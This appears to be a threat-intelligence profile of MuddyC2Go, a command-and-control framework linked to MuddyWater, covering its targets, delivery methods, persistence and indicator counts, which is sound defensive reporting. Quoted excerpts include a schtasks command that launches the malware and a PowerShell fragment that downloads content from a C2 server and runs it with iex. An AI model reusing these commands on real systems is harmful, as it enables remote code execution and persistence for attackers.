MuddyC2Go is a command-and-control framework associated with the Iranian espionage threat group MuddyWater, also tracked as Seedworm, Mango Sandstorm, and related aliases. It appears to have been in operational use since at least 2020 and is assessed to have supplanted the group’s earlier PhonyC2 infrastructure after that framework became exposed. The framework’s server-side web component is written in Go, while observed victim-side activity relies heavily on PowerShell stagers and launchers.
MuddyC2Go has been used in cyberespionage operations targeting organizations in the Middle East and Africa, including telecommunications providers and other regional entities. Reported victimology includes organizations in Jordan, Iraq, Israel, Egypt, Sudan, and Tanzania, with a notable concentration on telecommunications-sector targets. The framework has been linked to broader MuddyWater intrusion chains that combine custom malware, remote administration tools, proxy tooling, and credential-access utilities.
Observed delivery and execution patterns show MuddyWater using spearphishing and archive-based lures to gain initial access, including password-protected archives and deceptive shortcut-based execution chains. In some campaigns, PowerGUI-built executables embedded PowerShell that automatically connected to MuddyC2Go infrastructure. In other cases, MuddyC2Go-related components were launched through DLL sideloading using a legitimate executable. The framework has also been associated with infections staged behind legitimate remote management or remote access software, reflecting MuddyWater’s long-standing practice of blending custom command-and-control with legitimate administration tooling.
On compromised Windows systems, MuddyC2Go-related launchers have been observed retrieving command content from attacker-controlled infrastructure and executing it through PowerShell, enabling interactive post-compromise tasking. Reported behavior includes periodic beaconing for operator commands, use of scheduled tasks for persistence, and integration with reconnaissance and lateral movement activity conducted through tools such as WMI-based execution, remote access software, proxy utilities, and credential-focused tooling used elsewhere in MuddyWater operations. The framework therefore functions as part of a broader post-exploitation ecosystem rather than as a standalone commodity implant.
MuddyC2Go is best understood as a MuddyWater backdoor and C2 framework used to maintain access, execute PowerShell-based payloads, and support espionage-oriented operations across targeted enterprise environments.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Deep Instinct’s Threat Research team has identified a previously unreported C2 framework suspected to be in use by MuddyWater ... The framework’s web component is written in the Go programming language – hence the name we gave it: MuddyC2Go
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Right after this execution, attackers launched the MuddyC2Go malware using a scheduled task that had previously been created: "CSIDL_SYSTEM\schtasks.exe" /run /tn "Microsoft\Windows\JavaX\Java Autorun"
The response from the C2 is again a PowerShell script that runs every 10 seconds and waits for commands from the operator using the C2. | Instead of using a remote administration tool where an operator executes a PowerShell script to connect to MuddyWater’s C2, a new executable is now being sent. This executable contains an embedded PowerShell script that automatically connects to MuddyWater’s C2.
The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server... Invoke-WebRequest -Uri $uri -Method GET ... iex $response.Content;
49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malicious program in MuddyWater's arsenal used for command-and-control purposes.
A Go-based backdoor/C2 framework used by Seedworm that launches embedded PowerShell to contact C2 infrastructure and execute received code, providing remote access to victim machines.
A Go-based command-and-control framework attributed to MuddyWater that delivers PowerShell payloads, establishes operator-controlled communications, and appears to have replaced PhonyC2 in recent operations. It is used in post-compromise actions-on-objectives and has been observed since at least 2020.
A newly observed command-and-control framework attributed to MuddyWater for beaconing to custom C2 infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.